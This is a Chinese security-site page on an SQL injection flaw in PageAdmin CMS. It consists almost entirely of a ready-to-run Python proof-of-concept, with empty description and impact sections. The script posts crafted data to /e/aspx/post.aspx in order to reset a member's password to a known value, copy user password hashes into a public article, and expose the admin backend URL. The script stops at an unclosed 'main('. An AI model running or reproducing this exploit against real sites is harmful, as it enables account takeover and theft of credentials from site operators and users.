menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right PageMyAdmin sql注入漏洞 chevron_right PageMyAdmin sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    PageMyAdmin sql注入漏洞.md
    3.12 KB / 2021-07-15 19:59:02
        PageMyAdmin sql注入漏洞
=======================

一、漏洞简介
------------

二、漏洞影响
------------

三、复现过程
------------

### poc

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-


    import urllib2
    import urllib
    import re
    import sys

    def main():
        url=sys.argv[1]+"/e/aspx/post.aspx"
        fun=sys.argv[2]
        if fun=='upass':
            update(url)
        elif fun=='sqlinject':
            sqlinject(url)
        elif fun=='Backstage':
            Backstage(url)
        else:
            print'''
            usage: pageadminsql.py http://www.baidu.com/ upass
            parameter: uppass sqlinject Backstage
            '''
    def update(url):
        headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
        formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
        }
        postdata = urllib.urlencode(formate)
        request = urllib2.Request(url, data=postdata, headers = headers)
        try:
            response = urllib2.urlopen(request)
            if response.getcode()==200:
                print u">>>>>>修改密码成功 修改密码:admin_1234213<<<<<<"
                pass
        except Exception as e:
            print u">>>>>>修改密码失败<<<<<<"
            pass
    def sqlinject(url):
        headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
        formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
        }
        postdata = urllib.urlencode(formate)
        request = urllib2.Request(url, data=postdata, headers = headers)
        try:
            response = urllib2.urlopen(request)
            if response.getcode()==200:
                print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
                pass
        except Exception as e:
            print u">>>>>>密码注入失败<<<<<<"
            pass
    def Backstage(url):
        headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
        formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
        }
        postdata = urllib.urlencode(formate)
        request = urllib2.Request(url, data=postdata, headers = headers)
        try:
            response = urllib2.urlopen(request)
            if response.getcode()==200:
                print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
                pass
        except Exception as e:
            print u">>>>>>后台地址注入失败<<<<<<"
            pass
    if __name__ == '__main__':
        main(
    links
    file_download